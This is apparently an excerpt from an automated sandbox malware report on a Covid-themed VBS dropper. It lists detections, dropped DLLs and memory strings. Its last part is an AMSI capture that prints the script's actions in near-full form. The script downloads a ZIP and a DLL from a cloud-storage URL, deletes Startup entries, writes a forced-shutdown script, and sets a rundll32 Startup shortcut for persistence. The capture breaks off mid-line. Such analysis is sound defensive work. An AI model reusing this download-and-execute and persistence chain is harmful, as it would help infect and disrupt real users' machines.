Source: C:\Users\user\AppData\Roaming\44788286328315\ttmdaoktkityhfkfg34112692654132.dll | Avira: detection malicious, Label: TR/Black.Gen2 |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-16-5[1].dll | Avira: detection malicious, Label: TR/Black.Gen2 |
Source: C:\Users\user\AppData\Roaming\44788286328315\ttmdaoktkityhfkfg34112692654132.dll | Joe Sandbox ML: detected |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-16-5[1].dll | Joe Sandbox ML: detected |
Source: | Binary string: scrrun.pdb source: wscript.exe, 00000001.00000002.601221943.000001A4B2220000.00000002.00000001.sdmp |
Source: | Binary string: wscript.pdbGCTL source: wscript.exe, 00000001.00000002.601137414.000001A4B21A0000.00000002.00000001.sdmp |
Source: | Binary string: wscript.pdb source: wscript.exe, 00000001.00000002.601137414.000001A4B21A0000.00000002.00000001.sdmp |
Source: | Binary string: scrrun.pdbUGP source: wscript.exe, 00000001.00000002.601221943.000001A4B2220000.00000002.00000001.sdmp |
Source: | Initial file: .write ZXDFVHIJXTXNZLNYYGEJOJNR.responseBody |
Source: | Initial file: .savetofile LJETZISNBGIJOFCVGWUIZSLT, 2 |
Source: | Initial file: .write BFLCAJXFUHBOZFMBDCLJVIWJ.responseBody |
Source: | Initial file: .savetofile SASLHXXIDQYMUYFJXVRVATCD, 2 |
Source: Joe Sandbox View | IP Address: 8.8.8.8 8.8.8.8 |
Source: Joe Sandbox View | IP Address: 8.8.8.8 8.8.8.8 |
Source: Joe Sandbox View | ASN Name: GOOGLEUS GOOGLEUS |
Source: wscript.exe, 00000001.00000002.607733865.000001A4B42BB000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: wscript.exe, 00000001.00000002.607837899.000001A4B42D0000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0 |
Source: wscript.exe, 00000001.00000002.607837899.000001A4B42D0000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0? |
Source: wscript.exe, 00000001.00000002.607837899.000001A4B42D0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gsr202 |
Source: wscript.exe, 00000001.00000002.607733865.000001A4B42BB000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gts1o1core0 |
Source: wscript.exe, 00000001.00000002.607733865.000001A4B42BB000.00000004.00000001.sdmp | String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0 |
Source: wscript.exe, 00000001.00000002.607520766.000001A4B429F000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com |
Source: wscript.exe, 00000001.00000002.607837899.000001A4B42D0000.00000004.00000001.sdmp | String found in binary or memory: https://pki.goog/repository/0 |
Source: wscript.exe, 00000001.00000002.607260420.000001A4B426B000.00000004.00000001.sdmp | String found in binary or memory: https://storage.googleapis.com/ |
Source: wscript.exe, 00000001.00000002.607260420.000001A4B426B000.00000004.00000001.sdmp | String found in binary or memory: https://storage.googleapis.com/7 |
Source: wscript.exe, wscript.exe, 00000001.00000002.606699710.000001A4B3FCD000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.606781779.000001A4B4108000.00000004.00000001.sdmp | String found in binary or memory: https://storage.googleapis.com/mystorage2021/0.zip |
Source: wscript.exe, wscript.exe, 00000001.00000002.606699710.000001A4B3FCD000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.607607145.000001A4B42AE000.00000004.00000001.sdmp | String found in binary or memory: https://storage.googleapis.com/mystorage2021/P-16-5.dll |
Source: wscript.exe, 00000001.00000002.602734156.000001A4B231C000.00000004.00000020.sdmp | String found in binary or memory: https://storage.googleapis.com/mystorage2021/P-16-5.dllenu |
Source: P-16-5[1].dll.1.dr | Static PE information: .vmp0 and .vmp1 section names |
Source: C:\Windows\System32\wscript.exe | Process Stats: CPU usage > 98% |
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-16-5[1].dll E5C9CE8563AA0AB460EC150A29161ADC1918245C29647A7BCE353FDD7DF2D651 |
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\44788286328315\ttmdaoktkityhfkfg34112692654132.dll E5C9CE8563AA0AB460EC150A29161ADC1918245C29647A7BCE353FDD7DF2D651 |
Source: Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs | Initial sample: Strings found which are bigger than 50 |
Source: P-16-5[1].dll.1.dr | Static PE information: Number of sections : 12 > 10 |
Source: classification engine | Classification label: mal92.evad.winVBS@1/6@0/2 |
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\wfcfjfsoqjp.vbs | Jump to behavior |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs' |
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: wscript.exe, 00000001.00000002.609198281.000001A4B65ED000.00000004.00000001.sdmp | Binary or memory string: select * from Win32_OperatingSystem where Primary=true"); |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 | Jump to behavior |
Source: | Binary string: scrrun.pdb source: wscript.exe, 00000001.00000002.601221943.000001A4B2220000.00000002.00000001.sdmp |
Source: | Binary string: wscript.pdbGCTL source: wscript.exe, 00000001.00000002.601137414.000001A4B21A0000.00000002.00000001.sdmp |
Source: | Binary string: wscript.pdb source: wscript.exe, 00000001.00000002.601137414.000001A4B21A0000.00000002.00000001.sdmp |
Source: | Binary string: scrrun.pdbUGP source: wscript.exe, 00000001.00000002.601221943.000001A4B2220000.00000002.00000001.sdmp |
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Shell")WScript.Sleep(300000)Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _& "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_& "Primary=true")for each OpSys in OpSysSetretVal = OpSys.Win32Shutdown(6)nextIHost.CreateObject("Wscript.Shell");IWshShell3.SpecialFolders("AppData");IFileSystem3.CreateTextFile("C:\Users\user\AppData\Roaming\wfcfjfsoqjp.vbs", "true");ITextStream.Write("Set SFHISGAPSMULDDGFLMFHDFTG = CreateObject("WScript.Shell")");ITextStream.Write("WScript.Sleep(300000)");ITextStream.Write("Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _");ITextStream.Write("& "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_");ITextStream.Write("& "Primary=true")");ITextStream.Write("for each OpSys in OpSysSet");ITextStream.Write("retVal = OpSys.Win32Shutdown(6)");ITextStream.Write("next");ITextStream.Close();IWshShell3.SpecialFolders("StartUp");IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk", "true");IWshShell3.SpecialFolders("StartUp");IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbs", "true");IWshShell3.SpecialFolders("AppData");IFileSystem3.CreateFolder("C:\Users\user\AppData\Roaming\44788286328315");IWshShell3.SpecialFolders("AppData");IWshShell3.SpecialFolders("AppData");IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/0.zip", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\0.zip", "2");IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/P-16-5.dll", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\44788286328315\ttmdaoktkityhfkfg34112692654132.dll", "2");IHost.CreateObject("Wscript.Shell");IWshShell3.SpecialFolders("StartUp");IHost.CreateObject("WScript.Shell");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\puyfmugprn .lnk");IWshShortcut.TargetPath("rundll32");IWshShortcut.Arguments(" C:\Users\user\AppData\Roaming\44788286328315\ttmdaoktkityhfkfg34112692654132.dll SFsb9V5o7LTfxDWhDoh");IWshShortcut.Win |